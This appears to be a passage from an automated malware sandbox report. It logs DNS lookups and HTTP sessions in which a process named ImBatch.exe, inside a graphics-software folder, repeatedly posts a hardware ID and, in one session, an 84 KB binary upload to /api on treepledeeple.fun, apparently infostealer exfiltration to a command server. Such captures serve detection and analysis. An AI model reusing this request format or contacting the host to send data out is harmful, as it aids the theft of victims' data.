Sep 15, 2023 11:23:52.861910105 CEST	8.8.8.8	192.168.2.5	0xc28f	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:55.482979059 CEST	8.8.8.8	192.168.2.5	0x2732	No error (0)	treepledeeple.fun		172.67.139.34	A (IP address)	IN (0x0001)	false
Sep 15, 2023 11:23:55.482979059 CEST	8.8.8.8	192.168.2.5	0x2732	No error (0)	treepledeeple.fun		104.21.87.11	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.highmotionsoftware.com

treepledeeple.fun

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49721	104.193.111.101	443	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49722	104.193.111.101	443	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49734	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:25.096381903 CEST	418	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:25.096977949 CEST	419	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:25.409421921 CEST	427	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=i9pokju95r7i6dhg6jjt1tj686; expires=Tue, 09 Jan 2024 03:10:04 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:25 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mo7k7WjpQFe3mGPLzfnKKmNaXpoxrtvSxrGVnDKVaD7hPG3Z2CdA5%2BejQ0kTN92l6gL5MEZuAYyDOGfIWdgsf3FPvYN22GybvL2B0OD5s5phboQiUcPM4KDsMd7dHlXh6SZ1qQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcf920d7943ab-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:25.409477949 CEST	427	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49735	104.21.87.11	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:25.611243963 CEST	433	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:25.611848116 CEST	434	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:25.984844923 CEST	444	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=g1cjnsu3n0sodr619gtkvhqfp8; expires=Tue, 09 Jan 2024 03:10:04 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:25 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FfWu1cv2X8EIqhSJbWRvnnC3bJPWelifRjr59pcYMIrd3i4c1Q2P8c%2BTuuYfsarDjAE8zEJ6NJlzqPACdmQq2V1%2FGtWcLe3%2FNiVuU9Mku7jQWVeruMwHhDK6qY2G4PvnK%2F2fzw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcf95480e0f5f-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:25.984949112 CEST	444	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	49736	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:26.205435991 CEST	445	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:26.206147909 CEST	446	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:26.536751032 CEST	447	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=3m752lrk6jdvvk6ubcebbovof1; expires=Tue, 09 Jan 2024 03:10:05 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:26 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xPacr7PB7Fbv4kOoiOxntvBmLJ3mg9hp%2FNnLZcp%2BANJxN9ymG8CwBQG1UCO2C4dww6V4rVsNq00s8%2BYIjHXGnzyj%2BHvAfmlY08xRIlbFwJOZPGJAiYVS5rmtbaU9JpX1ZX2QcA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcf98fee143b2-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:26.536798954 CEST	447	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.5	49737	104.21.87.11	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:26.748605967 CEST	448	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:26.749248981 CEST	448	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:27.090245962 CEST	450	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=mibg9731eat7ls8nt4mnvr3en8; expires=Tue, 09 Jan 2024 03:10:05 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:26 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CscK8c1Dopr0kixbw3VoQrNcodoI%2FMCmZfXxoq1OnVanqQUGVHW0116Xves4ChqW7W25vuQnycHz%2BJW02LRCSUP2t%2Bw2LMDRuX2CVCa7Wpx%2B%2Bm%2F7AGfPxfj0wDTjwfY%2Fx%2BJxyA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcf9c6dbe3354-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:27.090291023 CEST	450	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.5	49738	104.21.87.11	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:27.675503969 CEST	450	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 83925 Host: treepledeeple.fun
Sep 15, 2023 11:23:27.676158905 CEST	462	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:27.766145945 CEST	463	OUT	Data Raw: d3 24 01 00 00 00 00 00 00 00 5e 45 c3 36 9a 76 79 b4 ad 73 54 db da 46 b4 ad c3 ad 6f 5d 7a 8c 53 df 3a b4 ed f0 b0 b6 b5 db f5 18 9b b6 1d 1a b2 d9 dc 6e 63 fe ff 29 6d fe ff 3f cc 17 98 9f 31 ff c9 bc c0 7c 9b 79 96 f9 57 e6 cb cc 67 49 02 00 Data Ascii: $^E6vysTFo]zS:nc)m?1\|yWgIi02jh}80]h4ib<\|EmUm6.m6m3m:1e74LCe6l{
Sep 15, 2023 11:23:27.766261101 CEST	466	OUT	Data Raw: 25 51 b0 28 b1 46 5a ca b8 6e ed a4 0b 91 78 dc 6f 6a 6d 59 2c 8b 75 d2 21 0e cb c8 0a b5 bc 50 2c 92 33 ee f4 fb 5c 91 57 f9 7d 47 64 17 32 8b e9 8d 95 2c 7b fe fc 14 4b ce 67 5b c8 e7 f8 46 c3 ea 74 4d 59 fd ad e4 eb 9d be f3 e7 e9 bb 41 fd de Data Ascii: %Q(FZnxojmY,u!P,3\W}Gd2,{Kg[FtMYASrMG_a'hSE-+HMST9~kb(h\|}kMvO&v}u>B.R;uN8[W\|Mk9>^rw)nU
Sep 15, 2023 11:23:27.766300917 CEST	468	OUT	Data Raw: 5f 8f bd 97 04 00 00 00 00 00 00 00 06 7b b3 c7 43 d1 94 97 76 d5 bc c4 af 7e 15 ac 05 43 c9 48 f2 f6 4c 22 3c a5 fd 1e d9 cd 29 5b 33 c9 69 3d 50 2e de d9 9a 49 45 f4 df f3 b5 68 9e fc 3e 31 da de ff 62 6f 7f 23 5b d8 9c 6d 73 c4 6b 64 f3 7a 5b Data Ascii: _{Cv~CHL"<)[3i=P.IEh>1bo#[mskdz[8w ]ov?r;6Kd5k*Y;?3_cg$AlGN{GA{;b/wM.6?swxZV_%;{zomi
Sep 15, 2023 11:23:27.766446114 CEST	471	OUT	Data Raw: de 39 5f 56 74 94 a2 a3 d7 b7 8a 54 20 5b b2 6d cb ae a6 d4 e4 ba 6e 9c d3 55 33 fe 12 4d b1 d5 ed 6b ef ce 3d f4 be 6d 68 76 dd d9 3f 73 77 61 6e 73 ba 74 e9 cc cd d5 b5 3b 73 0b af af ad de 59 d9 dc b8 39 75 39 d6 0f d3 79 c7 31 8d 73 8a 63 3d Data Ascii: 9_VtT [mnU3Mk=mhv?swanst;sY9u9y1sc=nC:dr/J3Sg:53})o^'>:zO8sNYoX5StJ3\^2}ku$_nVM{6A\|8Ye={iu"+G
Sep 15, 2023 11:23:27.766457081 CEST	474	OUT	Data Raw: 4b ee 28 77 99 1b 6c f0 07 03 ff 93 fd e7 81 9f 65 7e 99 fd 01 77 79 f0 52 ee 57 c2 4f 7b f5 89 3a 1b 2d 1c dc 2a 09 e2 d9 b3 fc 63 ef ad 46 f6 9a 6c d7 56 67 e4 74 36 f4 06 63 c4 f1 29 bd 45 7f f8 97 6b 13 de a0 8d bc f6 aa 1b 3a 7b e7 9c bd 01 Data Ascii: K(wle~wyRWO{:-*cFlVgt6c)Ek:{nnuVO{Q50l-1c,CV~=$ox&JA}D=vwDjKQKZS@z,.8IO'VMJAS=+v5m-VDu.)
Sep 15, 2023 11:23:27.766491890 CEST	476	OUT	Data Raw: ac 01 56 62 35 5a e4 65 4e a4 50 cc 87 fe 6b 7a 94 4a 21 4b 08 2d 39 82 42 67 de 0a 3d a4 4d b3 be 78 09 7b ef d8 f9 dd 97 4a f4 9e 61 f4 0f 28 a9 91 26 10 8d 1c 3f ba 36 ad 6b 71 43 eb 07 7d b8 b6 f9 d5 6f 07 25 84 a7 0e ea e1 b7 b3 5f 1e bb aa Data Ascii: Vb5ZeNPkzJ!K-9Bg=Mx{Ja(&?6kqC}o%_6{SwR>R`GU[BHHIxcjvJLvWq>.2^t$'\z1Y_xSQcWS[Cf]I? Jh7
Sep 15, 2023 11:23:27.766514063 CEST	479	OUT	Data Raw: c9 c9 34 a0 cc 3e 58 79 b2 75 23 fa 41 b6 eb ae 95 58 2d fe c5 e0 d4 b9 c8 1a e6 be c0 47 da dd 99 1b e4 7b f4 5c 89 eb 15 bb 37 a0 de 36 4c 77 51 45 c5 be 9f f4 c0 92 20 60 31 19 7c 11 33 8a 01 10 78 be 93 6c 92 7c a4 52 65 a4 4d 5f fe 79 71 8a Data Ascii: 4>Xyu#AX-G{\76LwQE `1\|3xl\|ReM_yqSMGoP&C?0S^\|Y[rE$WzTq)`;.7Z-agQ^Se73_J=->C]k%)4fxBrJlr[e1E7)k
Sep 15, 2023 11:23:27.766555071 CEST	481	OUT	Data Raw: f9 ed 6f 4b 72 04 75 b2 72 84 03 ad 7d 6d 0b 0d 0e 05 ff e7 cc c7 a2 72 62 67 64 6c a8 48 d6 2e 32 ae 53 c2 34 46 6d b8 d0 04 9e 27 b7 c4 88 e5 c1 cd 9b a9 f9 d1 69 c2 a9 4d 34 f6 f2 97 91 da f0 b0 34 d7 8a 44 51 c9 b8 30 34 10 e8 2f f1 08 91 c2 Data Ascii: oKrur}mrbgdlH.2S4Fm'iM44DQ04/w6<t?[](~~)3j\|yD+ks`h7kIO&T3nTiLkV@4;CEv>YMO&o}X_vmLqj}oX"=,oN~;+_
Sep 15, 2023 11:23:27.766581059 CEST	484	OUT	Data Raw: 66 d6 aa fd ba f6 16 7e b9 86 52 0d 52 60 63 fc 75 2f 7f b1 8c 7d 6d a8 4c b1 6c e4 cf 82 a2 61 e6 bd a6 85 53 de a4 7e d1 1a 3b f8 f1 aa c9 33 f6 20 c7 5a c7 f7 34 04 3f ef d8 46 2d de 48 6b f0 f0 c1 1c fe b4 9c 96 55 cd 7e e4 f0 b3 5d 1c 74 85 Data Ascii: f~RR`cu/}mLlaS~;3 Z4?F-HkU~]tZ(msHmt\Otf[!9.TPb\|VS\|\|Hs,67fZAQ\|5[d8.y%"_M<6Vsk&8Kx
Sep 15, 2023 11:23:28.366309881 CEST	537	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=1o1q04dnfsbpu41s97oi9j1pgo; expires=Tue, 09 Jan 2024 03:10:07 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:28 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BcL41YS7%2F9zNOCRD0dA2t4wC4q5gakehJBZquM5rRJE7dHGUYZikh0AryoZ4Z5UiFoZTPjQipHzZWv8vf8TWeAHjpqmw2jmzpMXDnQUcFWYvwWF9Y0%2F1k9JCwToo2GcuczH6Hw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfa22baac327-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:28.366352081 CEST	537	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.5	49739	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:28.605062962 CEST	538	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:28.605813980 CEST	539	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:28.907624006 CEST	540	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=ktf0q4nht9q5st44d0ib1r0fd4; expires=Tue, 09 Jan 2024 03:10:07 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:28 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ymphQNbLwilC%2FqdzZijgrMxS588nA38CrhVmjt0vOHyUUPugzsTfXSH6baX6fT8lohVnITRsFPH%2BY4mX70Ve68Mq9CyZxqEc%2FFmJ3Ua5%2F1YoZytdrnE5Z2Ky6%2FpD7jUBsXo38Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfa7fdeb4223-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:28.907758951 CEST	540	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.5	49740	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:29.129913092 CEST	541	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:29.130645990 CEST	541	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:29.479731083 CEST	542	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=06780vppd1dc5pfsu8q30fv2vf; expires=Tue, 09 Jan 2024 03:10:08 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:29 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sRvVXVjdrK6IxFxtCL1Wi3e2S1KYLmiNexa2OifIo%2F1VpZk9xaZKt4ChTRKakIJNChXppc33vhpbscBq53ZYyNEtt7jrCMF%2F2lHaD4s3aHhvgJKtkpQ7hhnU65zpjx%2BnvR0%2FVA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfab4918429d-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:29.479790926 CEST	543	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.5	49741	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:30.072593927 CEST	543	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:30.073256016 CEST	544	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:30.431041002 CEST	545	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=v8pk59einhb29bh4ntk9fnatcc; expires=Tue, 09 Jan 2024 03:10:09 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:30 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PQbADAm3VvcdGRanf22zu1r6SxJqRl6Uz8sVRrcF%2BM4Pm49G2L1MxQPlont1VNmYYr5R4u5y5HmD4Gu3%2FQdNMscHnYcB%2BfsXA5y8xhDvE9DQ0u6aEu1%2FgL50Z6S%2FlN9cOQeVJQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcfb129108cec-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:30.431092978 CEST	545	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
